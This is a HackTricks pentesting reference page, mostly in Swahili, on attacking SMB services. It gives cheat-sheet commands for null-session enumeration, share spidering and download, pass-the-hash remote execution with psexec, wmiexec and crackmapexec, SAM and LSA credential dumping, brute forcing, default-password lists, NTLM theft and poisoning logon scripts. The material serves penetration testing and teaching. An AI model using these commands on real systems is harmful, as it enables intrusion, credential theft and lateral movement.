HackTricks139,445 - Pentesting SMB
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Bandari 139
Network Basic Input Output System** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya mtandao wa eneo la karibu (LAN) kuingiliana na vifaa vya mtandao na kurahisisha uhamishaji wa data kupitia mtandao. Utambulisho na eneo la programu zinazoendesha kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa hadi herufi 16 kwa urefu na mara nyingi yatofautiana na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili huanzishwa wakati programu moja (inayoitenda kama mteja) inapotuma amri ya “call” kwa programu nyingine (inayoitenda kama seva) ikitumia TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Kiteknolojia, Port 139 inarejelewa kama ‘NBT over IP’, wakati Port 445 inatambulika kama ‘SMB over IP’. Akronimu SMB inasimama kwa ‘Server Message Blocks’, ambayo pia kwa sasa inajulikana kama Common Internet File System (CIFS). Kama protokoli ya mtandao ya safu ya programu, SMB/CIFS inatumiwa hasa kuwezesha upatikanaji wa pamoja wa mafayela, vichapishaji, milango ya serial, na kurahisisha aina mbalimbali za mawasiliano kati ya nodi kwenye mtandao.
Kwa mfano, katika muktadha wa Windows, kuna mguso kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS over TCP/IP, kupitia matumizi ya port 445. Kinyume chake, kwenye mifumo tofauti, kuna matumizi ya port 139, ikionyesha kwamba SMB inaendeshwa sambamba na NetBIOS over TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Itifaki ya Server Message Block (SMB), ikifanya kazi kwa mfano wa client-server, imeundwa kudhibiti ufikiaji wa faili, saraka, na rasilimali nyingine za mtandao kama vichapishaji na router. Inatumiwa hasa ndani ya mfululizo wa mfumo wa uendeshaji Windows, SMB huhakikisha ulinganifu wa nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa uendeshaji wa Microsoft kuwasiliana kwa urahisi na vinavyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa Samba unatoa suluhisho la programu huru, kuruhusu utekelezaji wa SMB kwenye mifumo ya Linux na Unix, hivyo kuwezesha mawasiliano ya mipaka ya majukwaa kupitia SMB.
Shares, zinazoonyesha sehemu yoyote ya mfumo wa faili wa ndani, zinaweza kutolewa na server ya SMB, na kufanya muundo wa saraka uonekane kwa mteja kwa njia ambayo kwa sehemu ni huru na muundo halisi wa server. The Access Control Lists (ACLs), ambazo zinaelezea haki za ufikiaji, zinatoa udhibiti wa kina juu ya ruhusa za watumiaji, zikiwemo sifa kama execute, read, na full access. Ruhusa hizi zinaweza kutengwa kwa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
IPC$ Share
Upatikanaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, ukiruhusu mwingiliano na huduma zilizo wazi kupitia named pipes. Zana ya enum4linux ni muhimu kwa madhumuni haya. Ikiwa itatumika ipasavyo, inaruhusu kupata:
- Taarifa kuhusu mfumo wa uendeshaji
- Maelezo kuhusu domain ya mzazi
- Orodha ya watumiaji na vikundi vya ndani
- Taarifa kuhusu SMB shares zilizopatikana
- Sera ya usalama ya mfumo inayotekelezwa
Uwezo huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. enum4linux hutoa mtazamo wa kina wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaowezekana na kuhakikisha huduma za SMB zimeshika usalama ipasavyo.
enum4linux -a target_ip
Amri hapo juu ni mfano wa jinsi enum4linux inaweza kutumika kufanya uorodheshaji kamili dhidi ya lengo lililofafanuliwa kwa target_ip.
NTLM ni nini
Kama haujui NTLM au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu NTLM unaelezea jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kunufaika nayo:
Server Enumeration
Scan mtandao ukitafuta hosts:
nbtscan -r 192.168.0.1/24
Toleo la seva ya SMB
Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua ni toleo gani linatumiwa. Kama taarifa hii haionekani katika zana nyingine zinazotumika, unaweza:
- Tumia MSF auxiliary module
**auxiliary/scanner/smb/smb_version** - Au script hii:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Tafuta exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Inawezekana Vyeti
| Jina la mtumiaji | Common passwords |
|---|---|
| (tupu) | (tupu) |
| guest | (tupu) |
| Administrator, admin | (tupu), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
Taarifa za Mazingira ya SMB
Pata Taarifa
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Orodhesha Watumiaji, Vikundi & Watumiaji Walioingia
Taarifa hizi zinapaswa tayari kuwa zimekusanywa kutoka enum4linux na enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Orodhesha watumiaji wa ndani
lookupsid.py -no-pass hostname.local
Amri ya mstari mmoja
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Orodhesha watumiaji wa ndani
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Kuchunguza LSARPC and SAMR rpcclient
Muunganisho wa GUI kutoka linux
Katika terminali:
xdg-open smb://cascade.htb/
Katika dirisha la kivinjari cha faili (nautilus, thunar, n.k)
smb://friendzone.htb/general/
Kuchunguza Folda Zilizoshirikiwa
Orodhesha folda zilizoshirikiwa
Inashauriwa kila wakati kuangalia kama unaweza kupata chochote; ikiwa huna credentials jaribu kutumia null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Unganisha/Orodhesha folda iliyoshirikiwa
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Orodhesha kwa mkono windows shares na kuungana nazo
Inawezekana kwamba umewekewa vikwazo kuonyesha shares yoyote ya mashine mwenyeji, na unapojaribu kuorodhesha inaonekana kana kwamba hakuna shares za kuunganishwa nazo. Kwa hiyo inaweza kuwa vyema kujaribu kuunganishwa kwa mkono na share. Ili kuorodhesha shares kwa mkono, unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME unapoitumia session halali (mfano null session au valid credentials). Haya yanaweza kuonyesha kama share ipo lakini huna ufikiaji wake, au share haipo kabisa.
Common share names for windows targets are
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Majina ya kawaida ya share kutoka Network Security Assessment 3rd edition)
Unaweza kujaribu kuungana nazo kwa kutumia amri ifuatayo
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
au script hii (ikitumia null session)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
mifano
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Orodhesha shares kutoka Windows / bila zana za mtu wa tatu
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
Konsoli ya CMD
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (kigrafiki)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (kiolesura cha picha), ingiza \\<ip>\ kuona shares zisizofichwa zinazopatikana.
Kuinganisha (mount) folda iliyoshirikiwa
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Pakua mafayela
Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Amri:
- mask: inaelezea mask ambayo inatumika kuchuja faili ndani ya saraka (mf. “” kwa faili zote)
- recurse: hugeuza recursion kuwa on (chaguo-msingi: off)
- prompt: hufanya kuonyeshwa kwa maombi ya majina ya faili kuzimwa (chaguo-msingi: on)
- mget: hufanya nakala ya faili zote zinazolingana na mask kutoka host hadi client machine
(Taarifa kutoka kwenye manpage ya smbclient)
Utafutaji wa Folda Zilizoshirikiwa za Domain
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider.
-M spider_plus [--share <share_name>]--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Specially interesting from shares are the files called Registry.xml as they inaweza kuwa na passwords for users configured with autologon via Group Policy. Or web.config files as they contains credentials.
Tip
The SYSVOL share is inasomwa by all authenticated users in the domain. In there you may pata many different batch, VBScript, and PowerShell scripts. You should angalia the scripts inside of it as you might pata sensitive info such as passwords. Also, don’t trust automated share listings: even if a share looks read-only, the underlying NTFS ACLs may allow writes. Always test with smbclient by uploading a small file to
\\<dc>\\SYSVOL\\<domain>\\scripts\\. If writable, you can poison logon scripts for RCE at user logon.
ShareHound – mkusanyaji wa OpenGraph kwa SMB shares (BloodHound)
ShareHound discovers domain SMB shares, traverses them, extracts ACLs, and emits an OpenGraph JSON file for BloodHound CE/Enterprise.
- Baseline collection:
- LDAP: orodhesha computer objects, soma
dNSHostName - DNS: tatua kila host
- SMB: orodhesha shares on reachable hosts
- Pitia shares (BFS/DFS), orodhesha files/folders, rekodi permissions
ShareQL-driven traversal
- ShareQL is a first-match-wins DSL to allow/deny traversal by host/share/path and set per-rule max depth. Lenga interesting shares and cap recursion.
Example ShareQL rules
# Only crawl shares with name containing "backup", up to depth 2
allow host * share * path * depth 0
allow host * share *backup* path * depth 2
deny host * share * path *
Matumizi
sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \
-rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql"
- Toa AD creds kwa kutumia
-ad/-au/-ap(au tumia-adpamoja na-au/-ap). Tumia-r/-rfkwa inline rules au faili. - Matokeo: JSON OpenGraph; ingiza ndani ya BloodHound ili ku-query hosts/shares/files na effective rights.
- Ushauri: Punguza max depth hadi 1–2 isipokuwa vichujio vyako ni vikali sana.
BloodHound attack-surface queries
- Principals wenye write-like access kwenye shares
MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB)
RETURN x
- Wahusika walio na FULL_CONTROL kwenye shares
Cypher: wahusika walio na FULL_CONTROL kwenye shares
```cypher MATCH (p:Principal)-[r]->(s:NetworkShareSMB) WHERE (p)-[:CanDelete]->(s) AND (p)-[:CanDsControlAccess]->(s) AND (p)-[:CanDsCreateChild]->(s) AND (p)-[:CanDsDeleteChild]->(s) AND (p)-[:CanDsDeleteTree]->(s) AND (p)-[:CanDsListContents]->(s) AND (p)-[:CanDsListObject]->(s) AND (p)-[:CanDsReadProperty]->(s) AND (p)-[:CanDsWriteExtendedProperties]->(s) AND (p)-[:CanDsWriteProperty]->(s) AND (p)-[:CanReadControl]->(s) AND (p)-[:CanWriteDacl]->(s) AND (p)-[:CanWriteOwner]->(s) RETURN p,r,s ```- Tafuta faili nyeti kwa ugani (kwa mfano, VMDKs)
MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File)
WHERE toLower(f.extension) = toLower(".vmdk")
RETURN p
Soma Registry
Unaweza kuwa na uwezo wa kusoma registry kwa kutumia baadhi ya discovered credentials. Impacket reg.py inakuwezesha kujaribu:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post Exploitation
Usanidi wa chaguo-msingi wa seva ya Samba kawaida upo katika /etc/samba/smb.conf na unaweza kuwa na baadhi ya usanidi hatari:
| Setting | Description |
|---|---|
browseable = yes | Je, inaruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? |
read only = no | Je, inakataza kuunda na kubadilisha faili? |
writable = yes | Je, inaruhusu watumiaji kuunda na kubadilisha faili? |
guest ok = yes | Je, inaruhusu kuungana na huduma bila kutumia nenosiri? |
enable privileges = yes | Je, inaheshimu ruhusa zilizotengwa kwa SID maalum? |
create mask = 0777 | Ni ruhusa gani zinatakiwa kupewa faili mpya zilizoundwa? |
directory mask = 0777 | Ni ruhusa gani zinatakiwa kupewa saraka mpya zilizoundwa? |
logon script = script.sh | Ni script gani inahitaji kutekelezwa wakati wa kuingia kwa mtumiaji? |
magic script = script.sh | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? |
magic output = script.out | Wapi matokeo ya magic script yanapaswa kuhifadhiwa? |
Amri smbstatus hutoa taarifa kuhusu seva na kuhusu nani ameunganishwa.
Thibitisha kwa kutumia Kerberos
Unaweza kuthibitisha kwa kerberos ukitumia zana smbclient na rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
Katika mazingira ya Kerberos pekee (NTLM imezimwa), jaribio za NTLM dhidi ya SMB zinaweza kurudisha STATUS_NOT_SUPPORTED. Rekebisha matatizo ya kawaida ya Kerberos na namua Kerberos auth:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
Kwa usanidi kamili wa mteja (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) angalia:
88tcp/udp - Pentesting Kerberos
Endesha Amri
crackmapexec
crackmapexec inaweza kutekeleza amri ikitumia yoyote ya mmcexec, smbexec, atexec, wmiexec, ambapo wmiexec ndio njia ya chaguo-msingi. Unaweza kuonyesha chaguo unachopendelea kutumia kwa kigezo --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Chaguzi zote mbili zitatengeneza huduma mpya (ikitumia \pipe\svcctl kupitia SMB) kwenye mashine ya mwathiriwa na kuitumia kuendesha kitu (psexec itafanya upload faili inayotekelezwa kwenye share ya ADMIN$ na smbexec italenga cmd.exe/powershell.exe na kuweka katika argumenti the payload –file-less technique--).
Taarifa zaidi kuhusu psexec and smbexec.
Katika kali iko kwenye /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Kwa kutumia parameter-k unaweza authenticate dhidi ya kerberos badala ya NTLM
wmiexec/dcomexec
Endesha command shell kwa siri bila kugusa disk au kuendesha service mpya kwa kutumia DCOM kupitia port 135.
Katika kali iko kwenye /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Kwa kutumia parameter-k unaweza kuthibitisha kwa kerberos badala ya NTLM
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Endesha amri kupitia Task Scheduler (ukitumia \pipe\atsvc kupitia SMB).
Katika kali iko kwenye /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Marejeo ya Impacket
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
ksmbd attack surface na SMB2/SMB3 protocol fuzzing (syzkaller)
Ksmbd Attack Surface And Fuzzing Syzkaller
Bruteforce credentials za watumiaji
Hii haipendekezwi — unaweza kuzuia akaunti ikiwa utazidi idadi ya majaribio iliyoruhusiwa
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Shambulio hili linatumia Responder toolkit ili kukamata SMB authentication sessions kwenye mtandao wa ndani, na kuzipitisha kwa target machine. Ikiwa authentication session itafanikiwa, itakuingiza moja kwa moja kwenye system shell.
Taarifa zaidi kuhusu shambulio hili hapa.
SMB-Trap
Laibrari ya Windows URLMon.dll hujaribu moja kwa moja kujithibitisha kwa host wakati ukurasa unapo jaribu kupata baadhi ya maudhui kupitia SMB, kwa mfano: img src="\\10.10.10.10\path\image.jpg"
Hii hutokea kwa functions zifuatazo:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Ambazo zinatumika na baadhi ya vivinjari na zana (kama Skype)
.png)
SMBTrap using MitMf
.png)
NTLM Theft
Kama ilivyo kwa SMB Trapping, kuweka faili zenye madhara kwenye target system (kwa kupitia SMB, kwa mfano) inaweza kusababisha jaribio la SMB authentication, likiruhusu NetNTLMv2 hash kupigwa kati kwa zana kama Responder. Hash inaweza kisha kuvunjwa offline au kutumika katika SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Marejeleo
- NetExec (CME) wiki – matumizi ya Kerberos
- Pentesting Kerberos (88) – usanidi wa mteja na utatuzi wa matatizo
- ShareHound (mkusanyaji)
- ShareQL (DSL)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.